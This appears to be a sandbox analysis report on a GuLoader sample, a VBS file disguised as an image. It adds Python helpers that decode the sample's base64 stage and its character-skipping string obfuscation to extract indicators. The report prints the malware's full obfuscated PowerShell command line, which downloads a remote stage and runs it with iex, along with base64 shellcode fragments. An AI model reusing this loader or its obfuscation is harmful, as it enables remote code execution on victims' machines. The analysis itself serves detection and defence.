          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: 1cAFuBeKQkZCsNo6C1ANeAEfUmZYxKmHQQh/BecSZCombkfXOBixzu5BhksHNfAwlfgx86jGBYhtXbnLQrCf6ZVz1uJKpI1MXsJFBslKlkT11RWZ14oGQmWwO4mTpZTpTqAXsfOYxTQB4LykmSABvZ1zJWyZcIt/MyuEflYSRE1Uv++/sSDxwpfdNaxDPilHxM0Bg8JGhHFH6nJ9w88Bn8JGhPXEFg/7IkeEfpP+N0bhFrHlFuHbS5pr5/P2Qga
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: LAA5z2jPszGtApvdnut7OXAlLmk+vk73wEPKelJdA3gJRMykfQbAiyiSaB4V/hX//dJzfJzPGT7BRoSyHBasmRTnAKEELDvd4bvNEjJhgcEOSU1eB/0d2B3doZ37gwd+bVcYwYubVTJ44ZW5XBU/VMSKjP8w+r01TMd3gAaRk/8A3oHRrBcY9yJHneNHl/Nrc4CQaGtD/Zf9apmzCgRZyYsm7AzaJOK0HXxsq5w7Sxcz0wCbmiC9rZjHd+gAs2X
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: wx0FTWnLwhRCdaIoyZy9vUKFNPARTgWVb8hWdkO6QrnAMap+9MevXVgbnP/wzQ+q9se3TH0uu/dGEoZ+w/5/qAYqgbLsHYFLTTlou/YL/bN0sEGgRoaFvUjD0HzDRkN9nVqY30J119MFewVVnwJFvkJ1eBnOhQCAQoUIadJEBZVLUZV8R7NDfR1acIdCdU7gk78FTTxaTVf6jQC1QkVlNuSfAKRChd1Bb0EFlZZ5KHlDvJj7GYGHNaBb8voZx7c
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: kceEfB6IEokBH4cr5YEBVcFGhDsak/b6LscBVcFGhBEiXyH/bm2GfsO+L7XjxwFVwUaEOTKdjBhCv7rug7kJVcFGhAs0BuL7C4GE0/QuvP/zMGlTpce0SvGg7P/z5a0KVSAFh+FegcDDCYdTeUbLfQRGRBkS4gCLQnZUUsg94td0rwVOWziYIkI78BywRoRxR980gTzHtFzhphm5Rn2GfsNvnS5lwnhHGscxRcFGhI30AXkYRpYFy/hEhH5LNoT
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: PMdyvHQRYP81j9uhVsdCmlq69ffFVL2OFtIxWm4gxpV7vR2WjxnDALMy1SDAwYR2w0aFjkrb83zDRtfFoo3/UUK1+jEK2QWV3MU2zpTaDZnKWRkY+r/8eWcA5WNuj1+fQzNxnqQ314EI6dnWZssQsqCxWI4qlrz6ERkArJj9PVFKT9LAyXNoXEKAqW4Z9AWQ477ir0KopkmcQg1wlOwhp2tYcgw4vv4odVap7/QxUCwieB+fEJ6COCe2hURAbNr
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: pcNcxcV+90A1hQH/MJATvh/DV/8wlSZw9Md3ec77URj6nm9QeKTIMTcgvbZCraa0Y6u8iUK1S9mxGuJHG8dvkeea3pXOx/kKi0eEfszJWC48uUdGCX5e/jz9vK5HhwG3QryG3Ks2BIfqe39aTVPsCDh3A//3YiebnZe4EkJqoBMzZsH/72K1ZY1XDfNrR4R+ehBZBbTuFf8yKZRkScd1idfErf8qiF2dFxcP82tHhH5CO/DVUUaEcU431IE8Lk1
          2024-05-28 06:08:59 UTC | 16384 | IN | Data Ascii: m8NcJJTNOVbBRoRxBHXffsPfm06bV2UN9zcEtF17vIGrSzCbY8ewWhlPs0yQ/ZvLwe4FjTdzPfBCtSLeVwIFjR4VifFChfTzHlTS4kqgjWBeIAGOukIv6hYJHSoJZUnTC3pmzb8IDBZDxTnSw0aEXszCJlg8udqGmEmFZVtGhOKdiBsA4lgc0iTHsFrJqAhozEezZMNGIpzZHP7ZiEi8KZu3PZYtrV1be+kIF5Cf3tdFz+aI3/iFDAhMBVLnm9c
          2024-05-28 06:09:00 UTC | 16384 | IN | Data Ascii: n0kFibGONNVCsdVwL4bX4kqlhUVewlUL6ouJmLv/sM4R6e3WT6zTtwjiGF+MGiBvrxkJJgjmB3XU+gOrpvzC2sinxpl4MBw5uLckdaXDRiVHutv/KBFnmv/Hd/ay3yn/MLo9DLIWPIJZnlpL2pMWLfbCd9urcw8lsheBaNonzy9fz2V/wtu8pbhcMHnHHChM2eZhdv81SeHPVf3nHHb0KgEe/0G4LRidRofdlenbEg1g+6R/l8HFI/As7AYVuuK
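The session above fetches /unprincipled.sea as text/plain (Content-Length 422528), and the body shown in the Data Ascii column is base64 text; the PowerShell stage (Target ID 2) decodes it with [System.Convert]::FromBase64String. The following is an added example, not code from the report or from the sample: it decodes the first 72 base64 characters of the first chunk exactly as printed above and checks the result for EB 02, the x86 "jmp short +2" that hops over two junk bytes, a standard anti-disassembly pattern in shellcode stagers. The function names, and the ratio threshold inside triage_response, are my own choices.

```python
import base64
import re

# First 72 base64 characters of the first 16384-byte chunk of /unprincipled.sea,
# copied from the report's "Data Ascii" column (cut to a multiple of four
# characters so the truncated display decodes without a padding error).
CHUNK_PREFIX = (
    "6wLNMOsCEni7yBoUAHEBm+sC6soDXCQEcQGb6wI2mLna"
    "d/+acQGb6wIWnoHpSbqfrHEBm+sC"
)

B64_BODY = re.compile(r"\A[A-Za-z0-9+/]+={0,2}\Z")


def looks_like_base64(body: str) -> bool:
    """True when the body, minus whitespace, uses only the base64 alphabet."""
    compact = "".join(body.split())
    return bool(compact) and B64_BODY.match(compact) is not None


def decode_stage(body: str) -> bytes:
    """Decode as [Convert]::FromBase64String would, after dropping a trailing
    partial 4-character group that a truncated capture may leave behind."""
    compact = "".join(body.split())
    compact = compact[: len(compact) - len(compact) % 4]
    return base64.b64decode(compact, validate=True)


def short_jump_sites(code: bytes) -> list[int]:
    """Offsets of EB 02 (x86 'jmp short +2'): a jump over two junk bytes."""
    return [i for i in range(len(code) - 1) if code[i] == 0xEB and code[i + 1] == 0x02]


def strip_jump_junk(code: bytes) -> bytes:
    """Heuristic: drop each EB 02 together with the two bytes it skips, leaving
    the bytes that actually execute. A genuine EB 02 inside an immediate would
    be removed as well, so use this for triage, not as a faithful unpacker."""
    out = bytearray()
    i = 0
    while i < len(code):
        if code[i] == 0xEB and i + 1 < len(code) and code[i + 1] == 0x02:
            i += 4  # skip the jmp (2 bytes) and the 2 bytes it jumps over
        else:
            out.append(code[i])
            i += 1
    return bytes(out)


def triage_response(content_type: str, body: str) -> list[str]:
    """Reasons to treat an HTTP body as a binary stage disguised as text."""
    reasons: list[str] = []
    if content_type.startswith("text/") and looks_like_base64(body):
        reasons.append("text/* body is pure base64")
        code = decode_stage(body)
        sites = short_jump_sites(code)
        if code[:2] == b"\xeb\x02":
            reasons.append("decoded bytes begin with EB 02 (jmp short over junk)")
        # one jump-over-junk per 16 bytes or denser is far beyond normal code
        if sites and len(code) // len(sites) <= 16:
            reasons.append(f"{len(sites)} jmp-short-over-junk sites in {len(code)} bytes")
    return reasons


if __name__ == "__main__":
    decoded = decode_stage(CHUNK_PREFIX)
    print("decoded:", decoded.hex(" "))
    print("jmp +2 at:", short_jump_sites(decoded))
    print("stripped:", strip_jump_junk(decoded).hex(" "))
    for reason in triage_response("text/plain", CHUNK_PREFIX):
        print("flag:", reason)
```

Those 72 characters decode to 54 bytes holding six EB 02 sites; once each jump and the two bytes it skips are removed, the stream starts with BB C8 1A 14 00 (mov ebx, 0x00141AC8). A text/plain response that decodes straight into x86 code deserves the same handling as a downloaded executable, whatever the Content-Type header says.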



          Target ID:0
          Start time:02:08:54
          Start date:28/05/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs"
          Imagebase:0x7ff6fea10000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:02:08:54
          Start date:28/05/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag 
EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma 
L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro= Cell AlkohGPens eConcet alle- TravCOptimoRug mnBrnd.tTppebeSammenmanertBrand Filic$WhitiSDi.idkSjakay Suspg,nimagBlueseOxla.mRe,eroApo.hrUnowneAnalylVedersHexad ');Hadaway (Skdefrakker 'Reawa$medvigAmneslUnsluo raksbForena,astblVicep:DiachCOversoHamardUndsleJern v P.coeB,oodlVegetoUnderpCoun.eBtteprChroms.epro Retha=Sup r Geusi[T rkiS AdelyCatabsAtmoctGgemmeBumblm Mil,.bl,odCProkuoMervrnF.siov.onpreFors rW opstBayre] unsp:Septi:KeirsF PercrOno aoTeak.mviru,B CiviaSolifs aarseLibe,6 .log4FreshSDemeatRavnerKajakisnowmn UdspgAmtsf(Ca.bu$ hydrTSongheforneeKnaphm,ovedsE.der)Jeete ');Hadaway (Skdefrakker 'Sekte$Impalg sa.ulBreadoFin,rbKodnia benzlVrik.: UnheGOxygesSinuot MillgMoiseiavnervkalasePrunkrSljfe Selv=Strm Grug[SaulqS andaySpejls To.ot SkoleTedesm Fnu . 
cardToutjueCalvixQasidtz,chi..eninEGennen NattcIntrooUdmaadVove,iAnvennMed.cgommbl] D.ss:Sneb,:Alb,rAFlustSA,owrC A.stIU.jetI diff.fodboGE,ilaeWeapotElec STyr,etbudstr BridiChappn Hel,gTol a(Abuli$ KarrCOktroo RededGrouneAfsnrvHjerteEarp l B leo ,oelp Ket.e Da arDivagsEmiel)Reall ');Hadaway (Skdefrakker 'opha,$Ce teg SkomlPlanloSka db StulahouselJeani: MateAPolionSids tH llwi Windn S iniVerd,hFecu,iPeartlTechniAnstdsPalm mS ici=Remin$Bed dG Ma,nsAc,tetBadesgNondeiLarynv MormePack.rAegir.Hive.s ConjuUdvikbKvad s silktantisrFodsaiUnprenGenregMiner( Dupl$ S.iaR Unhooskat.mmultiabetorn.hagotJunkii Lovmk A.kveK.rsfrAz ots Pseu,Gloss$TidskGsk.ldaHedesbMagtai OldkosanctnAd ecsDe.it) Op,u ');Hadaway $Antinihilism;"
          Imagebase:0x7ff6e3d50000
          File size:452'608 bytes
          MD5 hash:04029E121A0CFA5991749937DD22A1D9
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:true
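The command line above assembles $Megampere from 'Sub', 'strin' and 'g' (so it is the string "Substring"), and Skdefrakker returns $Gyldigt.Substring($i, 1) for $i = 5, 11, 17, ... while $i is below Length - 1: only every sixth character of each literal is payload and the other five are filler. Hadaway then invokes the decoded text through $Feeblenesses, which decodes to "iex". The following is an added example, not code from the report or the sample: a Python re-implementation of that scheme, an extractor that decodes every Skdefrakker '...' literal in a captured command line, and a helper that recovers the stride and offset from one literal whose plaintext is known, for related samples that change the constants. Note that the HTML rendering of this report collapses runs of spaces inside the longer literals, so only literals whose filler has no consecutive spaces decode cleanly from this page; the three used below are intact and decode to "User-Agent", ">" and "iex". The function and constant names are mine.

```python
import re

# Three literals copied verbatim from the powershell.exe command line in this
# report (Target ID 2). They are the ones short enough to have survived the
# whitespace collapsing of the HTML rendering unchanged.
SAMPLE_CMDLINE = (
    "$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';"
    "$sacrum=Skdefrakker 'Llers>Frugt ';"
    "$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';"
)


def skdefrakker(blob: str, start: int = 5, stride: int = 6) -> str:
    """Re-implementation of the script's helper: it calls
    $Gyldigt.Substring($i, 1) for $i = start, start+stride, ... while
    $i < Length - 1, so one character in every group of `stride` is payload."""
    return "".join(blob[i] for i in range(start, len(blob) - 1, stride))


LITERAL = re.compile(r"Skdefrakker\s+'([^']*)'")


def decode_literals(cmdline: str, start: int = 5, stride: int = 6) -> list[str]:
    """Decode every Skdefrakker '...' literal in a command line, in order."""
    return [skdefrakker(m.group(1), start, stride) for m in LITERAL.finditer(cmdline)]


def find_params(blob: str, known: str, max_start: int = 16, max_stride: int = 16) -> list[tuple[int, int]]:
    """Recover (start, stride) from one literal whose plaintext is known, e.g.
    the literal that must decode to 'iex' because its value is later used as
    the invocation operator. Useful when a sibling sample changes the constants."""
    return [
        (s, k)
        for s in range(max_start)
        for k in range(1, max_stride + 1)
        if skdefrakker(blob, s, k) == known
    ]


if __name__ == "__main__":
    for plain in decode_literals(SAMPLE_CMDLINE):
        print(repr(plain))
    print(find_params("BulimiRemaie vi.txBryll ", "iex"))
```

Run against an intact command line captured from process creation telemetry (rather than from a whitespace-collapsed HTML page), decode_literals yields the User-Agent string, the download URL and the concatenated Invoke-WebRequest, FromBase64String and Start-Sleep fragments in the order the script uses them, which is usually enough to write the network and file indicators without executing anything.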

          Target ID:3
          Start time:02:08:54
          Start date:28/05/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff66e660000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:4
          Start time:02:08:56
          Start date:28/05/2024
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"
          Imagebase:0x7ff6f47c0000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0e02c1c07d5c2fee75b2ddc0ec97a4238661f4c9d8097ca285654f331d3d9c6b
            • Instruction ID: e2b482a88247e8da8652c7e652299de20f503ad26211211da459ab4cdd83187e
            • Opcode Fuzzy Hash: 0e02c1c07d5c2fee75b2ddc0ec97a4238661f4c9d8097ca285654f331d3d9c6b
            • Instruction Fuzzy Hash: 26D10122B0E78A4FE7EA86685CA11B47FD0EF93230B4840BFD18DC75D7D91DA8068361
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d51d522fb823f2823ba8a63fa703918e61b8217567500a5d830c1a3f35729f50
            • Instruction ID: 65d469d12b7d7f1f0789ebd692432b94ed2a8059b272ffc9085e453247d1d46c
            • Opcode Fuzzy Hash: d51d522fb823f2823ba8a63fa703918e61b8217567500a5d830c1a3f35729f50
            • Instruction Fuzzy Hash: 04E14322B0EA8A8FEB95DB284CB41B87FE1EF56214B1841BED18DC71D7DA1CA805D351
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d4f7ea432b4c8ead3fe34e6e6dd120d9212266e9bc19a393f40cdf6222be9e71
            • Instruction ID: 6d858a4ab3b2aa1dcfe1a627a10283c90cadb54324288d5c255917866e8f2c2f
            • Opcode Fuzzy Hash: d4f7ea432b4c8ead3fe34e6e6dd120d9212266e9bc19a393f40cdf6222be9e71
            • Instruction Fuzzy Hash: 92D15722B0EACA1FE7A6EB6848A41B97FE1EF16310B0841FFD55DC71D7DA18A805C351
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 9c8087842c311b4f34431997cc7194008cc493bdc0d279f2420f751ef828b3a5
            • Instruction ID: 38d6339e1018e65a84d67d8232bc97920b22c3f2da368eab541d7873a21ddd7e
            • Opcode Fuzzy Hash: 9c8087842c311b4f34431997cc7194008cc493bdc0d279f2420f751ef828b3a5
            • Instruction Fuzzy Hash: 44B13422B0DB8A0FEBE59B2848A41B87FE1EF56220B4841BFD54DC75E7DE1CAC058351
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 816e8b482e346377d161f3463d64b97d10470aebec538752dedaaefa019987b4
            • Instruction ID: d95300cdf0d40a118138f03e6a9bdee1f539fa0b32efb892e16c197e7c1e43f6
            • Opcode Fuzzy Hash: 816e8b482e346377d161f3463d64b97d10470aebec538752dedaaefa019987b4
            • Instruction Fuzzy Hash: A8412662F0EA8A4FEBA5D72808F01B86BE1EF56214B5840BED19CC71D7DE1DE804A311
            Memory Dump Source
            • Source File: 00000002.00000002.2239362570.00007FFD34970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34970000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd34970000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4d4ec9ae1ee5030d2ee90adb3bbdb8fe90bfffdcc32774e37f3189b002513e3e
            • Instruction ID: 23385945a8907e79e52fb5fb38302b05f358b807b0834ce7636ce5ed5cb5e02e
            • Opcode Fuzzy Hash: 4d4ec9ae1ee5030d2ee90adb3bbdb8fe90bfffdcc32774e37f3189b002513e3e
            • Instruction Fuzzy Hash: E5312452F4EA9B0FE7E597681CB11B86EC2EF42234B5841BED51DC35D7ED0CA804A362
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
            • Instruction ID: 61d023836a036301be5b5b689af15e61005f9a1f3cd626edd26c956285a9f495
            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
            • Instruction Fuzzy Hash: 3B01677121CB0D4FD744EF4CE451AA5B7E0FB99364F10056DE58AC3651D636E881CB45
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID: M_^
            • API String ID: 0-3807191693
            • Opcode ID: 570376722fc97e161d17ea50a40af4e67167c880f89c60cf17dd4f00f501c0ee
            • Instruction ID: 5be0ab471dc3e22702444cd048992aaf6b18c0007f5da759097aa57d53abb1f6
            • Opcode Fuzzy Hash: 570376722fc97e161d17ea50a40af4e67167c880f89c60cf17dd4f00f501c0ee
            • Instruction Fuzzy Hash: ADB19547B0F7C65AE792573C58BA0E97FA0DF5322470D02F7C6C4DA0A7AC4D180BA2A1
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a0e3d92c6f7f238b1707d72252191c8578794dcb7abd51c58a65abeee269ee13
            • Instruction ID: f8be5597e0b78ea70129b6a70034e1eb6834ec2dd54d7430479ed88337e9b484
            • Opcode Fuzzy Hash: a0e3d92c6f7f238b1707d72252191c8578794dcb7abd51c58a65abeee269ee13
            • Instruction Fuzzy Hash: 43121632B08A5A8FDB94EBACD4A19E97BF0FF55320F080177D549C7153DA78A8468790
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1f1b3f43ea974ab79b18cda094ed36b49d4ffcce57ca4472a85761e5613efe08
            • Instruction ID: 45d7e598356c8f07b706fb28c7e6a9342545d9ea6ffc1d4886271bd7644fe7f5
            • Opcode Fuzzy Hash: 1f1b3f43ea974ab79b18cda094ed36b49d4ffcce57ca4472a85761e5613efe08
            • Instruction Fuzzy Hash: BEB18056A0F7D25FEB92572C98F20E67FA4DE5326970D00F7C6C5CA093D94C580BA362
            Memory Dump Source
            • Source File: 00000002.00000002.2238952566.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_7ffd348a0000_powershell.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b884096dde1e1bf931f675eb4f55ab799194e8a1f13a07df2f24031f699a4819
            • Instruction ID: e3ec12a8fb58d97a26c7895bf81ef80b459c2ac17a813ea1fecb5d090465318b
            • Opcode Fuzzy Hash: b884096dde1e1bf931f675eb4f55ab799194e8a1f13a07df2f24031f699a4819
            • Instruction Fuzzy Hash: 76318647B0FAC657F362432C58F50EDBF90DE1326471906F3CA85CA093AD4D6857B662